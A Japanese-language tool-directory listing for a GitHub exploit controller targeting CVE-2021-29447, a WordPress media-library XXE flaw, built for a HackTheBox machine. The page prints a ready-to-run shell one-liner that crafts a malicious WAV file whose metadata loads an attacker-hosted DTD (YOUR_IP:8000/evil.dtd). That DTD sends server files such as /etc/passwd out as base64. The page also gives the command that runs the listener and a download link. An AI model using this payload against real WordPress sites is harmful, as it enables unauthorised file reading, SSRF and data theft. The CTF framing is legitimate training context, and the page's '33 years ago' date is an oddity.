Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/elf1337/blind-xxe-controller-cve-2021-29447
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティCTF
GitHubelf1337/blind-xxe-controller-cve-2021-29447

blind-xxe-controller-CVE-2021-29447

任意ファイル読み取りコントローラー(CVE-2021-29447 に基づく)

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
33年前未レビュー

ブラインドXXEコントローラー

このコントローラーは、HackTheBoxのmetatwoマシンでCVE-2021-29447を悪用するために作成しました。CVE-2021-29447は、メディアライブラリにおけるWordPressのXXE脆弱性で、バージョン5.7、5.6.2、5.6.1、5.6、5.0.11に影響します。メディアライブラリにアップロードできる認証済みユーザーが悪意のあるwavファイルをアップロードすると、リモートからの任意ファイル読み取りやサーバーサイドリクエストフォージェリ(SSRF)につながる可能性があります。

この脆弱性を悪用するには、攻撃を成功させるまでに複数のステップが必要です。解析されたiXMLメタデータはユーザーに返されないため、悪用するにはブラインドXXEペイロードが必要です。これは、攻撃者が制御する外部文書型定義(DTD)を含めることで実現でき、攻撃者のリスニングサーバーに接続を返すための悪意のあるwavファイルを作成する必要があります。これらのステップが完了したら、wavファイルをサーバーにアップロードし、ペイロードファイル(例:/etc/passwd)のbase64エンコードされた内容を含むHTTPリクエストを受信するのを待って、base64をデコードします。このコントローラーには、これらの複数のステップに対するすべてのソリューションが含まれています。コントローラーの**$console >**にファイル名を入力するだけです。

詳細ブログ https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/

注: このコントローラーはHTB metatwoマシン向けに完全に構成されています。外部で使用する場合は、スクリプトにいくつか変更を加える必要があります。

使用方法

payload.wav という名前のWAVEファイルを作成します

root@kitploit:~
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:8000/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

main.py を実行します

root@kitploit:~
python3 main.py listen_ip

POC画像

/poc/poc.png

ツールをダウンロード